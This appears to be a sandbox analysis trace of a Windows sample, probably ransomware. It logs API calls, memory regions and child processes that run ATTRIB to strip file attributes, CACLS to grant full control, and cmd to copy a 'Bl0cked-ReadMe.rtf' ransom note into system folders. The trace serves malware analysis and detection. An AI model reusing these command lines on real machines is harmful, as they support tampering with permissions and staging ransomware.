[0147.223] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0147.223] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0147.223] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0147.223] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x30f2a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f2a0) returned 0xffffffff [0147.224] GetLastError () returned 0x2 [0147.224] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x30f2a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f2a0) returned 0xffffffff [0147.224] GetLastError () returned 0x2 [0147.224] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x30f2a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f2a0) returned 0xbe550 [0147.224] FindClose (in: hFindFile=0xbe550 | out: hFindFile=0xbe550) returned 1 [0147.224] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x30f2a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f2a0) returned 0xffffffff [0147.224] GetLastError () returned 0x2 [0147.224] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x30f2a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f2a0) returned 0xbe550 [0147.224] FindClose (in: hFindFile=0xbe550 | out: hFindFile=0xbe550) returned 1 [0147.224] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0147.224] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0147.224] GetConsoleTitleW (in: lpConsoleTitle=0x30f798, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0147.224] InitializeProcThreadAttributeList (in: lpAttributeList=0x30f620, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x30f6e8 | out: lpAttributeList=0x30f620, lpSize=0x30f6e8) returned 1 [0147.224] UpdateProcThreadAttribute (in: lpAttributeList=0x30f620, dwFlags=0x0, Attribute=0x60001, lpValue=0x30f6e0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x30f620, lpPreviousValue=0x0) returned 1 [0147.225] GetStartupInfoW (in: lpStartupInfo=0x30f5dc | out: lpStartupInfo=0x30f5dc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0147.225] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0147.225] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x30f67c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30f6c8 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png\"", lpProcessInformation=0x30f6c8*(hProcess=0x4c, hThread=0x50, dwProcessId=0xa48, dwThreadId=0xbc0)) returned 1 [0147.227] CloseHandle (hObject=0x50) returned 1 [0147.227] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0147.227] GetEnvironmentStringsW () returned 0xc2480* [0147.227] FreeEnvironmentStringsW (penv=0xc2480) returned 1 [0147.227] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0147.263] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x30f5bc | out: lpExitCode=0x30f5bc*=0x0) returned 1 [0147.263] CloseHandle (hObject=0x4c) returned 1 [0147.263] _vsnwprintf (in: _Buffer=0x30f704, _BufferCount=0x13, _Format="%08X", _ArgList=0x30f5c8 | out: _Buffer="00000000") returned 8 [0147.263] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0147.263] GetEnvironmentStringsW () returned 0xc2480* [0147.264] FreeEnvironmentStringsW (penv=0xc2480) returned 1 [0147.264] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0147.264] GetEnvironmentStringsW () returned 0xc2480* [0147.264] FreeEnvironmentStringsW (penv=0xc2480) returned 1 [0147.264] DeleteProcThreadAttributeList (in: lpAttributeList=0x30f620 | out: lpAttributeList=0x30f620) [0147.264] _get_osfhandle (_FileHandle=1) returned 0x7 [0147.264] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0147.264] _get_osfhandle (_FileHandle=1) returned 0x7 [0147.264] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0147.264] _get_osfhandle (_FileHandle=0) returned 0x3 [0147.264] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0147.265] SetConsoleInputExeNameW () returned 0x1 [0147.265] GetConsoleOutputCP () returned 0x1b5 [0147.265] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0147.265] SetThreadUILanguage (LangId=0x0) returned 0x409 [0147.265] exit (_Code=0) Process: id = "211" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16b60" os_pid = "0xc08" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "210" os_parent_pid = "0xb10" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 18215 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 18216 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 18217 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 18218 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 18219 start_va = 0x5b0000 end_va = 0x5b8fff entry_point = 0x5b0000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 18220 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 18221 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 18222 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 18223 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 18224 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 18225 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 18226 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 18227 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 18228 start_va = 0x1e0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 18229 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 18230 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 18231 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 18232 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 18233 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 18234 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 18235 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 18236 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 268 os_tid = 0xbf8 Thread: id = 269 os_tid = 0xbd8 Process: id = "212" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16b40" os_pid = "0xa48" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "210" os_parent_pid = "0xb10" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 18237 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 18238 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 18239 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 18240 start_va = 0x1b0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 18241 start_va = 0x5f0000 end_va = 0x5f6fff entry_point = 0x5f0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 18242 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 18243 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 18244 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 18245 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 18246 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 18247 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 18248 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 18249 start_va = 0x60000 end_va = 0x15ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 18250 start_va = 0x1f0000 end_va = 0x256fff entry_point = 0x1f0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 18251 start_va = 0x350000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 18252 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 18253 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 18254 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 18255 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 18256 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 18257 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 18258 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 18259 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 18260 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 18261 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 18262 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 18263 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 18264 start_va = 0x260000 end_va = 0x327fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 18265 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 18266 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 270 os_tid = 0xbc0 Process: id = "213" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea168c0" os_pid = "0xbe0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 18267 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 18268 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 18269 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 18270 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 18271 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 18272 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 18273 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 18274 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 18275 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 18276 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 18287 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 18288 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 18289 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 18290 start_va = 0x2e0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 18291 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 18292 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 18293 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 18294 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 18295 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 18296 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 18297 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 18298 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 18299 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 18300 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 18301 start_va = 0x1c0000 end_va = 0x287fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 18302 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 18303 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 18304 start_va = 0x290000 end_va = 0x296fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 18305 start_va = 0x2a0000 end_va = 0x2a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18306 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 18307 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 18308 start_va = 0x430000 end_va = 0x530fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 18309 start_va = 0x540000 end_va = 0x113ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 18310 start_va = 0x1140000 end_va = 0x12a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001140000" filename = "" Thread: id = 271 os_tid = 0xb24 [0147.350] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14fcb4 | out: lpSystemTimeAsFileTime=0x14fcb4*(dwLowDateTime=0x91c1d120, dwHighDateTime=0x1d440a9)) [0147.350] GetCurrentProcessId () returned 0xbe0 [0147.350] GetCurrentThreadId () returned 0xb24 [0147.350] GetTickCount () returned 0x2dc79 [0147.350] QueryPerformanceCounter (in: lpPerformanceCount=0x14fcac | out: lpPerformanceCount=0x14fcac*=20413966970) returned 1 [0147.351] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0147.351] __set_app_type (_Type=0x1) [0147.351] __p__fmode () returned 0x76b331f4 [0147.351] __p__commode () returned 0x76b331fc [0147.351] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0147.351] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0147.352] GetCurrentThreadId () returned 0xb24 [0147.352] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb24) returned 0x38 [0147.352] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0147.352] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0147.352] SetThreadUILanguage (LangId=0x0) returned 0x409 [0147.352] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0147.352] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14fc44 | out: phkResult=0x14fc44*=0x0) returned 0x2 [0147.352] VirtualQuery (in: lpAddress=0x14fc7b, lpBuffer=0x14fc14, dwLength=0x1c | out: lpBuffer=0x14fc14*(BaseAddress=0x14f000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0147.352] VirtualQuery (in: lpAddress=0x50000, lpBuffer=0x14fc14, dwLength=0x1c | out: lpBuffer=0x14fc14*(BaseAddress=0x50000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0147.352] VirtualQuery (in: lpAddress=0x51000, lpBuffer=0x14fc14, dwLength=0x1c | out: lpBuffer=0x14fc14*(BaseAddress=0x51000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0147.352] VirtualQuery (in: lpAddress=0x53000, lpBuffer=0x14fc14, dwLength=0x1c | out: lpBuffer=0x14fc14*(BaseAddress=0x53000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0147.352] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x14fc14, dwLength=0x1c | out: lpBuffer=0x14fc14*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0147.352] GetConsoleOutputCP () returned 0x1b5 [0147.352] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0147.352] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 